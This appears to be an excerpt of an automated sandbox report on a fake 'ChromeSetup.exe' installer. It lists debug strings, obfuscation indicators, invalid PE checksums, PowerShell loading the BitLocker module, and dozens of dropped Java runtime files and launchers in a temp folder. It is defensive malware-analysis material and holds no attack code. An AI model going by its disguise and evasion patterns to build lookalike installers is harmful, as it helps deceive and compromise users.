Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msvcr100.i386.pdb source: javaw.exe, 00000002.00000002.3392873090.000000006D031000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: t2k.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: msvcr120.i386.pdb source: javaw.exe, 00000002.00000002.3391610094.000000006CAD1000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000002.00000002.3392010694.000000006CC0A000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: msvcp120.i386.pdb source: javaw.exe, 00000002.00000002.3391479640.000000006CA51000.00000020.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^ source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000002.00000002.3391902623.000000006CBDD000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: ChromeSetup.exe, 00000000.00000002.1074694666.0000000000420000.00000004.00000001.01000000.00000003.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libbci\bci.pdb source: bci.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: javaw.exe, 00000002.00000002.3392205561.000000006CC56000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000002.00000002.3382359288.00000000005FC000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000002.00000000.1024355035.00000000005FC000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb* source: lcms.dll.0.dr
Source:	Binary string: C:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp

Data Obfuscation

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

PE file contains an invalid checksum

Source: NAct.dll.0.dr	Static PE information: real checksum: 0x35f7b should be: 0x3cd72
Source: UAC.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xde12
Source: uninst.exe.0.dr	Static PE information: real checksum: 0x4debfea should be: 0x2011e

PE file contains sections with non-standard names

Source: Intel_Processor_Identification_Utility-Legacy.exe.0.dr	Static PE information: section name: .didat
Source: jfxwebkit.dll.0.dr	Static PE information: section name: .unwante
Source: prism_sw.dll.0.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_083A326E push 8B6B54CFh; retf

5_2_083A3279

Source: msvcr100.dll.0.dr	Static PE information: section name: .text entropy: 6.90903234258047
Source: msvcr120.dll.0.dr	Static PE information: section name: .text entropy: 6.95576372950548
Source: msvcr100.dll0.0.dr	Static PE information: section name: .text entropy: 6.90903234258047

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Drops PE files

Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmid.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\client\jvm.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\verify.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunmscapi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jdwp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_common.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\instrument.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_socket.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\resource.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2native.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\splashscreen.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\eula.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fxplugins.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\nio.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\servertool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\lcms.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\UAC.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fontmanager.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\deploy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\hprof.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jjs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jawt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsound.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_sw.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\decora_sse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\net.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glib-lite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jli.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jabswitch.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcp120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\glass.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kinit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\bci.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\npt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\WindowsAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\Intel_Processor_Identification_Utility-Legacy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.cpl	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsdt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\policytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\awt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\keytool.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javafx_font_t2k.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\zip.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\kcms.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\ktab.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jsoundds.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\klist.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\nscFD89.tmp\NAct.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge-32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\t2k.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\management.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\mlib_image.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\pack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\wsdetect.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dcpr.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\Desktop\ChromeSetup.exe

File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.cpl

Jump to dropped file

Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\README.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
